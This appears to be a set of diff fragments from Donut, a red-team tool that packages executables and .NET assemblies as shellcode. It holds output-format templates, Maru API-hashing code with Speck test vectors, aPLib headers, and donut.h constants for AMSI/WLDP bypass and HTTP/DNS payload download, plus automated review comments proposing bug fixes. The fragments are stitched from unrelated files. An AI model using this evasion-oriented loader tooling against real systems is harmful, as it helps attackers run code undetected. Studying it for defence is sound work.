20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "format.h"
32
33 /**
34 Encoding: base64
35 Author : Odzhan
36
37 Encoding: c, python, ruby, c#, powershell and hex
38 Author : BITAM Salim https://github.com/soolidsnake
39 */
40
41 // calculate length of buffer required for base64 encoding
42 #define B64_LEN(N) (((4 * (N / 3)) + 4) & -4)
43
44 static const char b64_tbl[] =
45 "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
46
47 // Compact implementation of base64 encoding.
48 // The main encoding loop is inspired by Qkumba AKA Peter Ferrie.
49 // This uses a lookup table and accounts for unaligned input.
50 //
51 // odzhan
52 //
53 static int b64_encode(
54 const void *src, uint32_t inlen,
55 void *dst, uint32_t *outlen)
56 {
57 uint32_t i, len, x;
58 uint8_t *in = (uint8_t*)src, *out = (uint8_t*)dst;
59
60 // check arguments
61 if(outlen == NULL) return 0;
62
63 // calculate length of buffer required for encoded string
64 len = B64_LEN(inlen);
65
66 // return the length?
67 if(out == NULL) {
68 *outlen = len;
69 return 1;
70 }
71
72 // can buffer contain string?
73 if(len > *outlen) return 0;
74
75 // main encoding loop
76 while(inlen != 0) {
77 // load 3 bytes or whatever remains
78 for(x=i=0; i<3; i++) {
79 // add byte from input or zero
80 x |= ((i < inlen) ? *in++ : 0);
81 x <<= 8;
82 }
83 // increase by 1
84 inlen++;
85 // encode 3 bytes
86 for(i=4; inlen && i>0; i--) {
87 x = ROTL32(x, 6);
88 *out++ = b64_tbl[x % 64];
89 --inlen;
90 }
91 }
92 // if required, add padding
93 while(i!=0) { *out++ = '='; i--; }
94 // add null terminator
95 *out = 0;
96 // calculate output length by subtracting 2 pointers
97 *outlen = (uint32_t)(out - (uint8_t*)dst);
98 return 1;
99 }
100
101 int base64_template(void *pic, uint32_t pic_len, FILE *fd) {
102 uint32_t outlen;
103 void *base64;
104
105 DPRINT("Calculating length of base64 encoding");
106 if(b64_encode(NULL, pic_len, NULL, &outlen)) {
107 DPRINT("Required length is %"PRId32, outlen);
108 base64 = calloc(1, outlen + 1);
109 if(base64 == NULL) {
110 return DONUT_ERROR_NO_MEMORY;
111 }
112 DPRINT("Encoding shellcode");
113 if(b64_encode(pic, pic_len, base64, &outlen)) {
114 DPRINT("Writing %"PRId32 " bytes to file", outlen);
115 fwrite(base64, 1, outlen, fd);
116 }
117 }
118 // if on windows, copy base64 string to clipboard
119 #if defined(WINDOWS)
120 LPTSTR strCopy;
121 HGLOBAL hCopy;
122
123 DPRINT("Opening clipboard");
124 if(OpenClipboard(NULL)) {
125 DPRINT("Empying contents");
126 EmptyClipboard();
127
128 DPRINT("Allocating memory");
129 hCopy = GlobalAlloc(GMEM_MOVEABLE, outlen);
130 if(hCopy != NULL) {
131 strCopy = GlobalLock(hCopy);
132 // copy base64 string to memory
133 CopyMemory(strCopy, base64, outlen);
134 GlobalLock(hCopy);
135 DPRINT("Setting clipboard data");
136 // copy to clipboard
137 SetClipboardData(CF_TEXT, hCopy);
138 GlobalFree(hCopy);
139 }
140 CloseClipboard();
141 }
142 #endif
143 DPRINT("Freeing memory");
144 free(base64);
145 return DONUT_ERROR_SUCCESS;
146 }
147
148 int c_ruby_template(void * pic, uint32_t pic_len, FILE* fd){
149 uint32_t j;
150 uint8_t *p = (uint8_t*)pic;
151
152 fprintf(fd, "unsigned char buf[] = \n");
153
154 for(j=0; j < pic_len; j++) {
155 if(j % 16 == 0) fputc('\"', fd);
156
157 fprintf(fd, "\\x%02x", p[j]);
158
159 if(j % 16 == 15){
160 fprintf(fd, "\"\n");
161 }
162 }
163 if(j % 16 != 15) fputc('\"', fd);
164
165 fputc(';', fd);
166
167 return DONUT_ERROR_SUCCESS;
168 }
169
170 int py_template(void * pic, uint32_t pic_len, FILE* fd){
171 uint32_t j;
172 uint8_t *p = (uint8_t*)pic;
173
174 fprintf(fd, "buf = \"\"\n");
175
176 for(j=0; j < pic_len; j++){
177 if(j % 16 == 0) {
178 fprintf(fd, "buff += \"");
179 }
180 fprintf(fd, "\\x%02x", p[j]);
181
182 if(j % 16 == 15) {
183 fprintf(fd, "\"\n");
184 }
185 }
186 if(j % 16 != 15) {
187 fputc('\"', fd);
188 }
189 return DONUT_ERROR_SUCCESS;
190 }
191
192 int powershell_template(void * pic, uint32_t pic_len, FILE* fd){
193 uint32_t j;
194 uint8_t *p = (uint8_t*)pic;
195
196 fprintf(fd, "[Byte[]] $buf = ");
197
198 for(j=0; j < pic_len; j++){
199 fprintf(fd, "0x%02x", p[j]);
200 if(j < pic_len-1) fputc(',', fd);
201 }
202 return DONUT_ERROR_SUCCESS;
203 }
204
205 int csharp_template(void * pic, uint32_t pic_len, FILE* fd){
206 uint32_t j;
207 uint8_t *p = (uint8_t*)pic;
208
209 fprintf(fd, "byte[] my_buf = new byte[%" PRId32"] {\n", pic_len);
210
211 for(j=0; j < pic_len; j++){
212 fprintf(fd, "0x%02x", p[j]);
213 if(j < pic_len-1) fputc(',', fd);
214 }
215 fprintf(fd, "};");
216
217 return DONUT_ERROR_SUCCESS;
218 }
219
220 int hex_template(void * pic, uint32_t pic_len, FILE* fd){
221 uint32_t j;
222 uint8_t *p = (uint8_t*)pic;
223
224 for(j=0; j < pic_len; j++){
225 fprintf(fd, "\\x%02x", p[j]);
226 }
227 return DONUT_ERROR_SUCCESS;
228 }
229
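Review bot: The clipboard code in `base64_template` has three defects: the second `GlobalLock(hCopy)` should be `GlobalUnlock(hCopy)`, `GlobalFree(hCopy)` runs even when `SetClipboardData` succeeded — at which point the clipboard owns the handle — and the block is allocated with `outlen` bytes while `CF_TEXT` expects a NUL-terminated string (the `calloc` buffer already holds `outlen + 1` with the terminator written by `b64_encode`). In `py_template` the header writes `buf = ""` but every chunk appends to `buff`, so the generated script leaves `buf` empty; use `fprintf(fd, "buff += \"");` → `fprintf(fd, "buf += \"");`. The closing-quote check after the loops in `c_ruby_template` and `py_template` tests `j % 16 != 15` with `j == pic_len`, which emits a stray quote when `pic_len` is a multiple of 16 and omits it when `pic_len % 16 == 15`; `if(pic_len % 16 != 0)` is the condition that matches the loop. The clipboard rewrite follows.
```c
    hCopy = GlobalAlloc(GMEM_MOVEABLE, outlen + 1);   /* room for the NUL that CF_TEXT expects */
    if(hCopy != NULL) {
      strCopy = GlobalLock(hCopy);
      /* base64 was calloc'd with outlen + 1 and b64_encode NUL-terminates it */
      CopyMemory(strCopy, base64, outlen + 1);
      GlobalUnlock(hCopy);
      DPRINT("Setting clipboard data");
      /* on success the clipboard owns hCopy; free it only if the handoff failed */
      if(SetClipboardData(CF_TEXT, hCopy) == NULL) {
        GlobalFree(hCopy);
      }
    }
    /* … unchanged: CloseClipboard, free(base64), return … */
```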
0 # Generators
1
2 This folder contains Donut generators written in other languages than C. They are all developed by third-parties and are maintained separately, but are linked here as submodules. To clone Donut along with the submodules, run:
3
4 ```
5 git clone https://github.com/TheWover/donut.git --recursive
6 ```
+230
-23
hash.c less more
5353 t = k[3];
5454 k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
5555 k[0] = ROTR32(k[0],29) ^ k[3];
56 k[1] = k[2]; k[2] = t;
56
57 k[1] = k[2];
58 k[2] = t;
5759 }
5860 // return 64-bit ciphertext
5961 return x.q;
107109
108110 #ifdef TEST
109111
112 #include <stdint.h>
110113 #include <stdio.h>
111114 #include <stdlib.h>
112115 #include <string.h>
116 #include <sys/stat.h>
117 #include <inttypes.h>
118 #include <fcntl.h>
119
120 #if defined(_WIN32) || defined(_WIN64)
121 #define WINDOWS
122 #include <windows.h>
123 #pragma comment(lib, "advapi32.lib")
124 #else
125 #include <unistd.h>
126 #endif
127
128 // ******************************
129 // test vectors for SPECK-64/128
130 //
131 // 128-bit key
132 uint8_t key64[16]=
133 { 0x00, 0x01, 0x02, 0x03,
134 0x08, 0x09, 0x0a, 0x0b,
135 0x10, 0x11, 0x12, 0x13,
136 0x18, 0x19, 0x1a, 0x1b };
137
138 // 64-bit plain text
139 uint8_t plain64[8]=
140 { 0x74, 0x65, 0x72, 0x3b,
141 0x2d, 0x43, 0x75, 0x74 };
142
143 // 64-bit cipher text
144 uint8_t cipher64[8]=
145 { 0x48, 0xa5, 0x6f, 0x8c,
146 0x8b, 0x02, 0x4e, 0x45 };
147
148 // 64-bit type
149 typedef union _w64_t {
150 uint8_t b[8];
151 uint32_t w[2];
152 uint64_t q;
153 } w64;
154
155 // ******************************
156 // test vectors for Maru hash
157 //
158 typedef struct _maru_tv_t {
159 const char *str;
160 uint64_t hash;
161 } maru_tv_t;
162
163 maru_tv_t maru_tv[MARU_MAX_STR] = {
164 {"", 0x8E63EC0D29F27D07},
165 {"C", 0x19C7DC40E602AC8E},
166 {"73", 0x5197B6ACC87EF423},
167 {"NY4", 0x3BC2F21615A953C5},
168 {"X9TM", 0xC9EC6B72BF5273D6},
169 {"H339P", 0x6B60077EF084C1E2},
170 {"TMCT3N", 0x33374AA7206F00FC},
171 {"RF4M66W", 0xF7B91D9C42A886C5},
172 {"XTCX43NN", 0x615D4FB7A2246376},
173 {"C6XCYXF9F", 0x80D4B6324A24CEB6},
174 {"RR3TN69H9M", 0xE6369CFF4F98B4F8},
175 {"F9C9YNTMYYR", 0xF173A1158A4D80A9},
176 {"FPW779364RYH", 0x517A4E86DF00BB97},
177 {"WHN4N9CT7YF7C", 0xFCBA9541CD7765A5},
178 {"633H6CTRC64FWR", 0x79EEC9CC663EDDC1},
179 {"WPNX66993HPWNYX", 0x139CFA0D49AF17DC},
180 {"H66C3Y9F677WP96N", 0xEFF27A644D53171A},
181 {"TY3YX7N3FPN7YNWT4", 0x5361C6DBF89D0B47},
182 {"YF496N7XH4HYHRN6WM", 0x71451CE666D8E9A4},
183 {"TWP4M739RYTCTFMMCC7", 0xC17E5C46E2BEAD},
184 {"4FHNWP4MR9TT9Y6HYWCX", 0x1E40C5A64B8ECE85},
185 {"TCMHT3TF7T4TRCWCF6RPF", 0xD02290F438AA84A9},
186 {"4WW63CTHPR36MN7P3WXTHT", 0x79FBDCFC2ECE09FF},
187 {"NFFMNM3CF3NXY6P9MCC7YPX", 0x10B7C56D102D623B},
188 {"R74YN9MX7PMP364HYNYCR9FY", 0x86EC8AA614611458},
189 {"94X3NFT7W4FPTX3MCTY99HMPR", 0x7929169892B04FC1},
190 {"66R379FR67W7T7H79WTCF37H6Y", 0xBEA85FD3754045D8},
191 {"4F6HFPT3NRN7WPP766RFCXR43RX", 0x76E410266A6830A},
192 {"HP374TWWPMYRTTWC6Y6T4C4T4HP4", 0x6A7509443FF48F74},
193 {"TTX3966P63XPYMPM6XM994TX9X9X3", 0xA8AFC37C137AE14},
194 {"34TX7XRX4WH7T6PW439TNRY77FHPT4", 0xE64667746B53394},
195 {"P3WRCCT4PXN3H6PMNR3YXY6X379MTXH", 0xCE981B296791D5C7},
196 {"73YF99H9XXTYC6XF6CXTPCM4YXYN33R4", 0xE39B1FC51BED4BA9},
197 {"T7R3PR43C93MH4TRT6M644T7RCXMX4WM6", 0xE25C6B39CB28FDB5},
198 {"44M69YYFX3C9H9M6P46933PW34RRCM9NXX", 0x84DBD675600E871E},
199 {"7TW7P76CXMFC3HFTFHMWXWW33TWTPT6PYP3", 0xE00F660E699F9231},
200 {"6CH6W7WYHH7HXT7RTMW4FRCN39HR997F6FWN", 0x32AEC917C63A878E},
201 {"WF3HNPT37XPPXYFXR447F7RWF3C69H74CT6R6", 0x4B4FCD2604496365},
202 {"WR9CCHH9NNNXCXYMXMFFW6YYC7449M4HYXM4MC", 0x330DA5A18A58C952},
203 {"C9993Y93PTWYRNP46PYN763RNFYP4PN4WWHR9CM", 0x5249D03CD52C71DB},
204 {"XNPXCY47FWWMTFF6R7RWNX79MC4YN43M9RYCC4RX", 0xF11E92E74F70C4F4},
205 {"3RPX6MFNCWPMPT3M467HWCYCHH9PM7R6MFWXYXNTN", 0x86C8BD9789AA71BE},
206 {"633MWRYMCYF3TTCRP6HXTR9TTX43T3MYXPPWMWFMF6", 0xA5F12FC7418615CC},
207 {"RW7NN6Y4779639NNTHN6TR939F3799FNWTH4FP46RNY", 0x37EADA4549B0B96F},
208 {"MCTRH9PTXRXFPMYRP9Y4TC4PCRX4W9YFCW649R3YN33W", 0x8E5BADDF84BB9779},
209 {"F7RT3H36PNH6CF9TWCRNYMFWX9M9MTTNY6C7X43HC4PN9", 0x8040D317E8DCD294},
210 {"7HTCNCTNHRFY6HCRTYPTHYP3H9T4PR96RWRY7NRPTMH936", 0x151FB43ECC51AFA1},
211 {"NYRMPMYCWXTPRCYM9TX6Y4XTMY9RT3PHH49PP36H7XR7WPN", 0x650A8724A052DFC5},
212 {"6PX3XWM3X973693M4F373R3N9FNC4CCTXN3CTTYMP3NW4C49", 0x9E48D8154522BFDD},
213 {"74RNX9MTPW7FNY9WMTXNPPRMR97PRPPRCN3CMHPNWFFW44R3C", 0xDC1ABDA05084DCBA},
214 {"47NC63XRTXXPWHN76H9XF9R7TTHWR6T7XMF9TMCHP4FX4WCYTT", 0x5DC075A21ECF2DD8},
215 {"TYMXHXC4N6XXTR4T7X37PHWTYXFF9M7MXP6477RW4FM7P9PFXFR", 0x2CD151D5D71FA785},
216 {"MRPW7NCXPT4N7YN3WN7P9WYNY3PPR464WR7P7PP37MXFF9FC7WTH", 0x7B88469D5AFE14D9},
217 {"9XW6RYX6NTYC4NCRR7YRTWM7HWNFXRT4P396CYMFPRNTRW3X69R39", 0x81E069528C3C9BEE},
218 {"9NMRWF4W34MHWTPP74RY34YWMT94H76HTRX34MR7C9MF696M3TXMN3", 0x4D19A0CB3BC48BFF},
219 {"HF6FM9RMT3NPMR37TX3FPTFYRFNXTMHWTF7WN94YNP4TMP3FNHM3N9F", 0x30CEBE63BE4E30F1},
220 {"NW7CCWFTTNFPMTY3H6X96HX6MXY67W3RPTRCCWHWPYPC7PPRF74PH7RC", 0x64F3DF1E551B22BE},
221 {"HFH43PM9TNCCW79XCMW79HYCN4HY6MT9MFFRYRXYX4H3P9T9FHF6NWC3C", 0xEF36678895FBB3A8},
222 {"N7WH9WYMNHYY3C3RRFTW3RNYH3C646C97FTPT3MH7TMW6MTC4PT44NWCWH", 0x1B75D90E82D98E1D},
223 {"663F4T7PMWN996R9FYWRY3Y33HCNFH6PRWF9TPHN363YFFF6C9CHTP3XNXP", 0x25767AD747B833D6},
224 {"3P7934TX6CFHPM6TWY6H4CXT47P4XRMFTPNMCFP9H9F4MPFWWF9XRMPHFCYX", 0x1F3E15CB56A60E93},
225 {"WW6YN7NXTH9TRT4PYW9W3WTNP9XMHP6Y3NPX7R93Y763M9HRHWTN93W3M9WX3", 0x744735578C4F6EF2},
226 {"HT6R4P6P7T4YFYYX3H3F49XYMPCPMWNT6R3PHTM47PTHTRCN9XMFHHYTH7TMPY", 0x559EA0D5309795E6},
227 {"NHP9Y96YYF44H7NN33WYYC364CY3W4FNF6F7WTHN6WFF6RXXRWNRFF4T9XF934N", 0xBE7F06CC36982F52},
228 };
229
230 void bin2hex(const char *str, void *bin, int len) {
231 int i;
232 uint8_t *p = (uint8_t*)bin;
233
234 printf("%s[%i] = { ", str, len);
235
236 for(i=0;i<len;i++) {
237 printf("0x%02x", p[i]);
238 if((i+1) != len) putchar(',');
239 }
240 printf(" };\n");
241 }
242
243 // returns 1 on success else <=0
244 static int CreateRandom(void *buf, uint64_t len) {
245
246 #if defined(WINDOWS)
247 HCRYPTPROV prov;
248 int ok;
249
250 // 1. acquire crypto context
251 if(!CryptAcquireContext(
252 &prov, NULL, NULL,
253 PROV_RSA_AES,
254 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
255
256 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
257 CryptReleaseContext(prov, 0);
258
259 return ok;
260 #else
261 int fd;
262 uint64_t r=0;
263 uint8_t *p=(uint8_t*)buf;
264
265 fd = open("/dev/urandom", O_RDONLY);
266
267 if(fd > 0) {
268 for(r=0; r<len; r++, p++) {
269 if(read(fd, p, 1) != 1) break;
270 }
271 close(fd);
272 }
273 return r == len;
274 #endif
275 }
276
277 // Generate a random string, not exceeding MARU_MAX_STR bytes
278 // tbl is from https://stackoverflow.com/a/27459196
279 static int GenRandomString(void *output, uint64_t len) {
280 uint8_t rnd[MARU_MAX_STR];
281 int i;
282 char tbl[]="HMN34P67R9TWCXYF";
283 char *str = (char*)output;
284
285 if(len > (MARU_MAX_STR - 1)) return 0;
286
287 // generate MARU_MAX_STR random bytes
288 if(!CreateRandom(rnd, MARU_MAX_STR)) return 0;
289
290 // generate a string using unambiguous characters
291 for(i=0; i<len; i++) {
292 str[i] = tbl[rnd[i] % (sizeof(tbl) - 1)];
293 }
294 str[i] = 0;
295 return 1;
296 }
297
298 void gen_maru_tv(void) {
299 char str[MARU_MAX_STR+1];
300 w64 h, iv;
301 int i;
302
303 // copy 64-bit IV (just using the speck ciphertext)
304 memcpy(iv.b, cipher64, 8);
305
306 // create vectors
307 for(i=0; i<MARU_MAX_STR; i++) {
308 // generate a random string
309 memset(str, 0, sizeof(str));
310 GenRandomString(str, i);
311
312 // derive a hash for string
313 h.q = maru(str, iv.q);
314
315 printf("{\"%s\", 0x%llX},\n", str, h.q);
316 }
317 }
113318
114319 int main(int argc, char *argv[]) {
115
116 uint64_t ulDllHash, ulApiHash, iv;
117 char *api, *dll;
118
119 if(argc != 4) {
120 printf("\nusage: maru <iv> <dll> <api>\n");
121 return 0;
122 }
123
124 // convert hexadecimal IV to binary
125 iv = strtoull(argv[1], NULL, 16);
126 dll = argv[2];
127 api = argv[3];
128
129 printf("\nIV : %p\n", (void*)iv);
130
131 ulDllHash = maru(dll, iv);
132 printf("DLL : %p\n", (void*)ulDllHash);
133
134 ulApiHash = maru(api, iv) + ulDllHash;
135 printf("API : %p\n", (void*)ulApiHash);
136
320 int i, equ;
321 w64 p, c, h, iv;
322
323 // copy 64-bit plaintext
324 memcpy(p.b, plain64, 8);
325
326 // encrypt in-place with 128-bit key
327 c.q = speck(key64, p.q);
328 equ = (memcmp(c.b, cipher64, 8)==0);
329 printf("SPECK-64/128 Test : %s\n\n", equ ? "OK" : "FAILED");
330
331 // set iv
332 memcpy(iv.b, cipher64, 8);
333
334 // compare test vectors
335 for(i=0; i<MARU_MAX_STR; i++) {
336 h.q = maru(maru_tv[i].str, iv.q);
337
338 if(maru_tv[i].hash != h.q) {
339 printf("Maru test # %i failed.\n", i);
340 break;
341 }
342 }
343 if(i == MARU_MAX_STR) printf("Maru tests OK\n");
137344 return 0;
138345 }
139346 #endif
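Review bot: `CreateRandom` treats descriptor 0 as failure (`if(fd > 0)`), and `gen_maru_tv` ignores the return of `GenRandomString`, so if `/dev/urandom` cannot be opened the vectors are printed from a zeroed buffer with no indication; use `if(fd >= 0) {` and `if(!GenRandomString(str, i)) { printf("random source failed\n"); return; }`. The `printf("{\"%s\", 0x%llX},\n", str, h.q)` passes a `uint64_t` to `%llX`; with `<inttypes.h>` already included, `printf("{\"%s\", 0x%" PRIX64 "},\n", str, h.q);` is the portable form. `GenRandomString` also compares the `int` loop index against a `uint64_t` length; declaring `i` as `uint64_t` avoids the sign-mismatch warning.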
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * ELF 64-bit format header file
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #ifndef APLIB_H_INCLUDED
12 #define APLIB_H_INCLUDED
13
14 #ifdef __cplusplus
15 extern "C" {
16 #endif
17
18 #ifndef APLIB_ERROR
19 # define APLIB_ERROR ((unsigned int) (-1))
20 #endif
21
22 unsigned int aP_pack(const void *source,
23 void *destination,
24 unsigned int length,
25 void *workmem,
26 int (*callback)(unsigned int, unsigned int, unsigned int, void *),
27 void *cbparam);
28
29 unsigned int aP_workmem_size(unsigned int inputsize);
30
31 unsigned int aP_max_packed_size(unsigned int inputsize);
32
33 unsigned int aP_depack_asm(const void *source, void *destination);
34
35 unsigned int aP_depack_asm_fast(const void *source, void *destination);
36
37 unsigned int aP_depack_asm_safe(const void *source,
38 unsigned int srclen,
39 void *destination,
40 unsigned int dstlen);
41
42 unsigned int aP_crc32(const void *source, unsigned int length);
43
44 unsigned int aPsafe_pack(const void *source,
45 void *destination,
46 unsigned int length,
47 void *workmem,
48 int (*callback)(unsigned int, unsigned int, unsigned int, void *),
49 void *cbparam);
50
51 unsigned int aPsafe_check(const void *source);
52
53 unsigned int aPsafe_get_orig_size(const void *source);
54
55 unsigned int aPsafe_depack(const void *source,
56 unsigned int srclen,
57 void *destination,
58 unsigned int dstlen);
59
60 #ifdef __cplusplus
61 } /* extern "C" */
62 #endif
63
64 #endif /* APLIB_H_INCLUDED */
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * C depacker, header file
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #ifndef DEPACK_H_INCLUDED
12 #define DEPACK_H_INCLUDED
13
14 #ifdef __cplusplus
15 extern "C" {
16 #endif
17
18 #ifndef APLIB_ERROR
19 # define APLIB_ERROR ((unsigned int) (-1))
20 #endif
21
22 /* function prototype */
23 unsigned int aP_depack(const void *source, void *destination);
24
25 #ifdef __cplusplus
26 } /* extern "C" */
27 #endif
28
29 #endif /* DEPACK_H_INCLUDED */
3131 #ifndef DONUT_H
3232 #define DONUT_H
3333
34 #ifdef _MSC_VER
35 #define _CRT_SECURE_NO_WARNINGS
36 #define _CRT_NONSTDC_NO_DEPRECATE
37 #endif
38
3439 #include <stdint.h>
3540 #include <stdio.h>
3641 #include <stdlib.h>
3843 #include <sys/stat.h>
3944 #include <inttypes.h>
4045 #include <fcntl.h>
46 #include <limits.h>
4147
4248 #if defined(_WIN32) || defined(_WIN64)
4349 #define WINDOWS
4450 #include <windows.h>
45 #ifndef PAYLOAD_H
51 #ifndef LOADER_H
4652 #include "mmap.h"
4753 #endif
4854 #if defined(_MSC_VER)
4955 #pragma comment(lib, "advapi32.lib")
56 #pragma comment(lib, "user32.lib")
57 #define strcasecmp stricmp
5058 #endif
5159 #else
5260 #define LINUX
5664 #include "pe.h"
5765 #endif
5866
59 #ifndef PAYLOAD_H
67 #ifndef LOADER_H
6068
6169 #if defined(DEBUG)
6270 #define DPRINT(...) { \
7078
7179 #endif
7280
73 #if !defined(NOCRYPTO)
7481 #include "hash.h" // api hashing
7582 #include "encrypt.h" // symmetric encryption of instance+module
76 #endif
83 #include "format.h" // output format for loader
84 #include "aplib.h" // aPLib compression for both windows + linux
7785
7886 #if !defined(WINDOWS)
7987 #define strnicmp(x,y,z) strncasecmp(x,y,z)
93101 } GUID;
94102 #endif
95103
96 #define DONUT_KEY_LEN CIPHER_KEY_LEN
97 #define DONUT_BLK_LEN CIPHER_BLK_LEN
98
99 #define DONUT_ERROR_SUCCESS 0
100 #define DONUT_ERROR_FILE_NOT_FOUND 1
101 #define DONUT_ERROR_FILE_EMPTY 2
102 #define DONUT_ERROR_FILE_ACCESS 3
103 #define DONUT_ERROR_FILE_INVALID 4
104 #define DONUT_ERROR_NET_PARAMS 5
105 #define DONUT_ERROR_NO_MEMORY 6
106 #define DONUT_ERROR_INVALID_ARCH 7
107 #define DONUT_ERROR_INVALID_URL 8
108 #define DONUT_ERROR_URL_LENGTH 9
109 #define DONUT_ERROR_INVALID_PARAMETER 10
110 #define DONUT_ERROR_RANDOM 11
111 #define DONUT_ERROR_DLL_FUNCTION 12
112 #define DONUT_ERROR_ARCH_MISMATCH 13
113 #define DONUT_ERROR_DLL_PARAM 14
114 #define DONUT_ERROR_BYPASS_INVALID 15
104 #define DONUT_KEY_LEN CIPHER_KEY_LEN
105 #define DONUT_BLK_LEN CIPHER_BLK_LEN
106
107 #define DONUT_ERROR_SUCCESS 0
108 #define DONUT_ERROR_FILE_NOT_FOUND 1
109 #define DONUT_ERROR_FILE_EMPTY 2
110 #define DONUT_ERROR_FILE_ACCESS 3
111 #define DONUT_ERROR_FILE_INVALID 4
112 #define DONUT_ERROR_NET_PARAMS 5
113 #define DONUT_ERROR_NO_MEMORY 6
114 #define DONUT_ERROR_INVALID_ARCH 7
115 #define DONUT_ERROR_INVALID_URL 8
116 #define DONUT_ERROR_URL_LENGTH 9
117 #define DONUT_ERROR_INVALID_PARAMETER 10
118 #define DONUT_ERROR_RANDOM 11
119 #define DONUT_ERROR_DLL_FUNCTION 12
120 #define DONUT_ERROR_ARCH_MISMATCH 13
121 #define DONUT_ERROR_DLL_PARAM 14
122 #define DONUT_ERROR_BYPASS_INVALID 15
123 #define DONUT_ERROR_NORELOC 16
124 #define DONUT_ERROR_INVALID_FORMAT 17
125 #define DONUT_ERROR_INVALID_ENGINE 18
126 #define DONUT_ERROR_COMPRESSION 19
127 #define DONUT_ERROR_INVALID_ENTROPY 20
115128
116129 // target architecture
117 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
118 #define DONUT_ARCH_X86 1 // x86
119 #define DONUT_ARCH_X64 2 // AMD64
120 #define DONUT_ARCH_X84 3 // AMD64 + x86
130 #define DONUT_ARCH_ANY -1 // for vbs and js files
131 #define DONUT_ARCH_X86 1 // x86
132 #define DONUT_ARCH_X64 2 // AMD64
133 #define DONUT_ARCH_X84 3 // x86 + AMD64
121134
122135 // module type
123 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
124 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
125 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
126 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
127 #define DONUT_MODULE_VBS 5 // VBScript
128 #define DONUT_MODULE_JS 6 // JavaScript or JScript
129 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
136 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
137 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
138 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
139 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
140 #define DONUT_MODULE_VBS 5 // VBScript
141 #define DONUT_MODULE_JS 6 // JavaScript or JScript
142
143 // format type
144 #define DONUT_FORMAT_BINARY 1
145 #define DONUT_FORMAT_BASE64 2
146 #define DONUT_FORMAT_RUBY 3
147 #define DONUT_FORMAT_C 4
148 #define DONUT_FORMAT_PYTHON 5
149 #define DONUT_FORMAT_POWERSHELL 6
150 #define DONUT_FORMAT_CSHARP 7
151 #define DONUT_FORMAT_HEX 8
152
153 // compression engine
154 #define DONUT_COMPRESS_NONE 1
155 #define DONUT_COMPRESS_APLIB 2
156 #define DONUT_COMPRESS_LZNT1 3 // COMPRESSION_FORMAT_LZNT1
157 #define DONUT_COMPRESS_XPRESS 4 // COMPRESSION_FORMAT_XPRESS
158 #define DONUT_COMPRESS_XPRESS_HUFF 5 // COMPRESSION_FORMAT_XPRESS_HUFF
159
160 // entropy level
161 #define DONUT_ENTROPY_NONE 1 // don't use any entropy
162 #define DONUT_ENTROPY_RANDOM 2 // use random names
163 #define DONUT_ENTROPY_DEFAULT 3 // use random names + symmetric encryption
164
165 // misc options
166 #define DONUT_OPT_EXIT_THREAD 1 // after the main shellcode ends, return to the caller which eventually calls RtlExitUserThread
167 #define DONUT_OPT_EXIT_PROCESS 2 // after the main shellcode ends, call RtlExitUserProcess to terminate host process
130168
131169 // instance type
132 #define DONUT_INSTANCE_PIC 1 // Self-contained
133 #define DONUT_INSTANCE_URL 2 // Download from remote server
134
135 // AMSI/WLDP options
136 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
137 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
138 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
139
140 // apparently C# can support 2^16 or 65,536 parameters
141 // we support up to eight for now :)
142 // Changing these would require updating call_api.asm for unmanaged EXE/DLL
143 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
144 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
145 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
146 #define DONUT_MAX_URL 256
147 #define DONUT_MAX_MODNAME 8
148 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
149 #define DONUT_VER_LEN 32
150 #define DONUT_DOMAIN_LEN 8
170 #define DONUT_INSTANCE_EMBED 1 // Module is embedded
171 #define DONUT_INSTANCE_HTTP 2 // Module is downloaded from remote HTTP/HTTPS server
172 #define DONUT_INSTANCE_DNS 3 // Module is downloaded from remote DNS server
173
174 // AMSI/WLDP level
